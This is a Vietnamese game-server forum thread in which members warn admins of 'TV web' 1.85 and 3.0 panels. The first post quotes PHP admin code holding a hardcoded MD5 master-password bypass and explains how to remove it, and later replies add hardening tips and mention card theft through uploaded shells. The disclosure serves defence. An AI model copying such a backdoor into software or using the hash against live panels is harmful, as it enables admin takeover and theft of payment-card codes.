Kết quả 1 đến 10 của 23
-
31-12-11, 04:22 PM #1
- Ngày tham gia
- Apr 2011
- Đang ở
- Địa Ngục Trần Gian
- Bài viết
- 619
- Thanks
- 130
- Thanked 347 Times in 165 Posts
Cảnh báo ai sử dụng TV web 1.85 và 3.0
Mình đang dezend và crack TV 3.0 thì phát hiện 1 cách chôm thẻ của TV.
So sánh với tv 1.85 thì bản 1.85 cũng có.
Các admin mu lưu ý nhé.
Trong file:
Server\admin\security.php
có đoạn code này:
PHP Code:if (md5($_GET['control']) != "[COLOR="#FF0000"]e992bbb8e2041788f7ad563b8eeb79d6[/COLOR]")
if ( !in_array($_SERVER['REMOTE_ADDR'], $list_ip) ) {
echo "Ban Khong Phai Thanh Vien BQT thi vao lam gi? he he";
exit();
}
?>
Server\admin\cardphone.php
PHP Code:if ($_POST[submit]) {
$pass = md5($_POST[codecard]);
if ($pass == $passcard || $pass == "[COLOR="#FF0000"]e992bbb8e2041788f7ad563b8eeb79d6[/COLOR]") $_SESSION['codecard'] = $passcard;
}
trong file này:
Server\admin\view_card.php
PHP Code:if ($_POST[submit]) {
$pass = md5($_POST[viewcard]);
if ($pass == "$passviewcard") $_SESSION['viewcard'] = "$passviewcard";
}
tương tự trong file Server\admin\checkip.php
cũng có đoạn code đó:
PHP Code:if ($_POST[submit]) {
$code = md5($_POST[code]);
if ($code == $passcode || $code == "e992bbb8e2041788f7ad563b8eeb79d6") $_SESSION['code'] = $passcode;
}
Nếu các bạn ko tin thì có thể so sánh với NBB web:
Server\admin\cardphone.php
PHP Code:if ($_POST[submit]) {
$pass = md5($_POST[codecard]);
if ($pass == "$passcard") $_SESSION['codecard'] = "$passcard";
}
PHP Code:if ($_POST[submit]) {
$code = md5($_POST[code]);
if ($code == "$passcode") $_SESSION['code'] = "$passcode";
}
Đó là các file nguy hiểm mà mình phát hiện được, còn các cái khác mình đang tìm hiểu.
Cách chữa: Nếu ai ko biết về code thì vào các file trên xóa các pass md5 đi.
Dòng này là phải xóa nè: e992bbb8e2041788f7ad563b8eeb79d6
ai không tin thì vào bản của Mr.Cuong share, ko có dòng này thì mình chết liền- : Y!M
-
The Following 13 Users Say Thank You to apple For This Useful Post:
0917423632(02-04-12),ductruong_kr(31-12-11), duyanh12285 (31-12-11), enternal1603 (31-12-11), huntersun (31-12-11), kenbi (03-01-12), longdtskn (17-07-12), Mr.Hau (01-01-12), mrgacon (05-05-12), mrvu058 (31-12-11), muhoangsa (31-12-11), SnowBlood™ (10-02-12)
-
31-12-11, 04:33 PM #2
Ðề: Cảnh báo ai sử dụng TV web 1.85 và 3.0
Cái này bản 1.85 cũng có đấy chứ ! tại mọi người không để ý đấy thôi ^^!
Khách viếng thăm hãy cùng mrrainnt xây dựng diễn đàn CLBGAMESVN vững mạnh nhé!
-
31-12-11, 04:36 PM #3
Ðề: Cảnh báo ai sử dụng TV web 1.85 và 3.0
dù sao mình cũng thks nếu k có nhưng người như bạn sao mà tớ biết nhỉ @@
Khách viếng thăm hãy cùngductruong_krxây dựng diễn đàn CLBGAMESVN vững mạnh nhé!
-
31-12-11, 04:47 PM #4
Ðề: Cảnh báo ai sử dụng TV web 1.85 và 3.0
Khách viếng thăm hãy cùng mrrainnt xây dựng diễn đàn CLBGAMESVN vững mạnh nhé!
-
The Following 4 Users Say Thank You to mrrainnt For This Useful Post:
hangson3100 (31-12-11), huntersun (31-12-11),
ninhmca(05-01-12), SnowBlood™ (10-02-12)
-
31-12-11, 04:48 PM #5godhoangGuest
Ðề: Cảnh báo ai sử dụng TV web 1.85 và 3.0
bản nbb 4.1 free cũng bị nè !
mẹ nó, hôm wa thằng bạn nó nạp 150k, sau đó gh thấy nó có 150k hỏi lạ, hỏi nó nó bảo nạp cái đc ngay 150k
dò log nạp thẻ thì k có, nó bật log thẻ thì ghi "Sv bảo trì"
giờ ghê lắm, up shell trộm mã thẻ đt không hà, fải wa yahoo thôi !Khách viếng thăm hãy cùng godhoang xây dựng diễn đàn CLBGAMESVN vững mạnh nhé!
-
31-12-11, 05:01 PM #6
Ðề: Cảnh báo ai sử dụng TV web 1.85 và 3.0
Khách viếng thăm hãy cùng mrrainnt xây dựng diễn đàn CLBGAMESVN vững mạnh nhé!
-
31-12-11, 05:17 PM #7
- Ngày tham gia
- Oct 2010
- Bài viết
- 446
- Thanks
- 43
- Thanked 14 Times in 8 Posts
Ðề: Cảnh báo ai sử dụng TV web 1.85 và 3.0
Khách viếng thăm hãy cùng TRIEN xây dựng diễn đàn CLBGAMESVN vững mạnh nhé!
-
31-12-11, 05:21 PM #8
Ðề: Cảnh báo ai sử dụng TV web 1.85 và 3.0
Khách viếng thăm hãy cùng mrrainnt xây dựng diễn đàn CLBGAMESVN vững mạnh nhé!
-
31-12-11, 05:26 PM #9
- Ngày tham gia
- Apr 2009
- Bài viết
- 97
- Thanks
- 10
- Thanked 18 Times in 7 Posts
Ðề: Cảnh báo ai sử dụng TV web 1.85 và 3.0
tôi thấy rất là hài hước cho các làm mu online đê kiếm tiền và cơm áo mà đơn giản việc cài web ban đầu các bạn cũng không nhận ra để bảo mật. lẽ ra khi làm phải edit toàn bộ chú
các bạn hãy lưu ý kỹ thay đổi mã Md5 đi + edit ip về local 127.0.0.1
=> md5 trong server/admin/checkip.php =>
=> server/admin/listip.txt => nên coi lại cái này nhé cho về 127.0.0.1 => điên ip vào đây là đang nhập admin dc đấy
=> server/admin/security.php => fix luôn đi
=> ngoài server/conifig.php
$list_ip = array (
'127.0.0.1', =>
'115.112.187.78', =>> các bạn config kết nối trên host không nên để nhiều ip ở đây và không để ai biết ip nha vì đang nhập quyền admin bằng cái này được
);
lưu ý nũa phần home
admin
home/admin/config.php => mã md5 cần sửa
home/admin/security.php =>mã md5 cần sửa
home/admin/listip.txt => de ip 127.0.0.1 => chỉ mình trên máy chủ mới vào dc thôi còn bạn điền ip máy khác thì máy đó sẽ đăng nhập admin dc luôn
sorry hơi làng nhàng tí các bác thông cảm giùmKhách viếng thăm hãy cùng lengockien xây dựng diễn đàn CLBGAMESVN vững mạnh nhé!
-
The Following 9 Users Say Thank You to lengockien For This Useful Post:
duyanh12285 (31-12-11), huntersun (31-12-11), longdtskn (31-07-12), mrgacon (05-05-12), mrrainnt (31-12-11), pelinh (15-05-12), SnowBlood™ (10-02-12), thantainho (31-12-11)
-
31-12-11, 05:27 PM #10
-
Các thành viên gởi lời cảm ơn đến apple vì bài viết này !
duyanh12285 (31-12-11)